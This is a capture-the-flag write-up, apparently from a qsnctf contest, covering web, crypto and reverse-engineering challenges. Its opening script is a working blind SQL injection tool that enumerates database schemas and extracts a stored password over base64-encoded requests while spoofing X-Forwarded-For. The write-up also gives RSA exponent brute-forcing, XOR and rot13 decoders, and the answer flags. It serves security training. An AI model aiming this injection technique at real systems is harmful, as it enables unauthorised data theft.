import requests import base64 import time import string def main(): table = string.printable.strip() res = "" i = 1 while 1: n = 0 while n < len(table): #payload = f"admin' and if(substr((select group_concat(schema_name) from information_schema.schemata),{i},1)='{table[n]}',1,0); #" #information_schema,mysql,performance_schema,ctftraining,test,sql #payload = f"admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1)='{table[n]}',1,0); #" #flag_table,news,users # limit 1,1 #payload = f"admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='users'),{i},1)='{table[n]}',1,0); #" payload = f"admin' and if(substr((select group_concat(password) from sql.user where username='flag'),{i},1)='{table[n]}',1,0); #" print(payload) payload = "user:{}|pass:admin".format(payload) content = base64.b64encode(payload.encode()).decode() url = f"http://89f188af-9856-452f-9aed-f4ea82f83339.recruit.qsnctf.com:8080/check.php?data={content}" headers = {"X-Forwarded-For":"127.0.0.1"} s = requests.Session() http = s.get(url,headers=headers,allow_redirects=False) if "登陆成功" in http.text: i += 1 res += table[n] break print(res) n += 1 if n == len(table): break main()
import binascii with open('content.txt','r') as f: content = '' for i in f.read().split('\n'): content += i.replace(' ','') open('result.zip','wb').write(binascii.unhexlify(content))
import binascii import base64 content3 = """ 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 +Vp/p01UAAAAASUVORK5CYII= """.split('\n') content = "" line = [] for i in content3: content += i content+="" print(content) open('flag.png','wb').write(base64.b64decode(content))
运行得到flag的另一半,最后拼接得到最终flag
qsnctf{b5512946-d7ac-45c9-afd0-a3f28ba547ea}
Crypto
82.83.65
import gmpy2 import libnum from Crypto.Util.number import * from binascii import a2b_hex,b2a_hex flag = b"*********************" p = 262248800182277040650192055439906580479 q = 262854994239322828547925595487519915551 e = 65533 n = p*q d = gmpy2.invert(e,(p-1)*(q-1)) # print(d) c = pow(int(b2a_hex(flag),16),e,n) print(c) # C = 31021919570683223794356421266753186826747161146739784961769368259629146487802
from base64 import b64encode as b32encode from gmpy2 import invert,gcd,iroot from Crypto.Util.number import * from binascii import a2b_hex,b2a_hex import random flag = "*************" nbit = 128 p = getPrime(nbit) q = getPrime(nbit) n = p*q print p print n phi = (p-1)*(q-1) e = random.randint(20000,50000) while True: if gcd(e,phi) == 1: break; else: e -= 1; c = pow(int(b2a_hex(flag),16),e,n) print b32encode(str(c))[::-1] print str(c) # 20392798836838831460465406987101354448592610558736461081264936079945558905138
p = 185392927331398754034773152474166007097 n = 33047182186833739970146873552408478599841138065558351794468963853252513446871 c = =gzMxUDM5gTN1UDN5kzNwYzM5QjNyEDOwEjN0YzM3gTN1ATM2ITO1gDN0QTNzEDMxcDO5YDM0UjN0AjN0EzM4gzM4YzM4gTO3ITOzAjM
n,p,c已知 e范围20000-50000 爆破下即可。
import base64 from gmpy2 import invert,gcd from Crypto.Util.number import * n = 33047182186833739970146873552408478599841138065558351794468963853252513446871 p = 185392927331398754034773152474166007097 q = n//p c = '=gzMxUDM5gTN1UDN5kzNwYzM5QjNyEDOwEjN0YzM3gTN1ATM2ITO1gDN0QTNzEDMxcDO5YDM0UjN0AjN0EzM4gzM4YzM4gTO3ITOzAjM' c = int(base64.b64decode(c[::-1]).decode()) phi=(p-1)*(q-1) for e in range(20000,50000): if gcd(e,phi) == 1: d = invert(e,phi) m = pow(c,d,n) if b'qsnctf' in (long_to_bytes(m)): print(long_to_bytes(m))
运行得到flag
qsnctf{!RSA_SO_EASY$$}
Reverse
Check
64位程序,主要程序:
异或解密下就行。
ls = ['q','r','l','`','p','c','}','J','8','q',';','e','S','A','a','y','u','N','k','|','a','4','k'] + [""]*100 for i in range(23): ls[i+24] = chr(i ^ ord(ls[i])) print(''.join(ls[23:]))
import base64 import string def rot13(n): digit = string.digits lower = string.ascii_lowercase upper = string.ascii_uppercase res = "" for i in n: if i in digit: res += chr((digit.index(i) +5)%10 + 48) elif i in lower: res += chr((lower.index(i) + 13)%26 +97) elif i in upper: res += chr((upper.index(i) + 13)%26 +65) else: res += i return res cipher = "=DzMuO8MmgaomuGA9Rmpj5lAkAwZgxQplNGYhOwAi6lAmywZlqGZ7LQB7pGs"[::-1] print(cipher,rot13(cipher)) print(rot13(base64.b64decode(rot13(cipher)).decode())[::-1])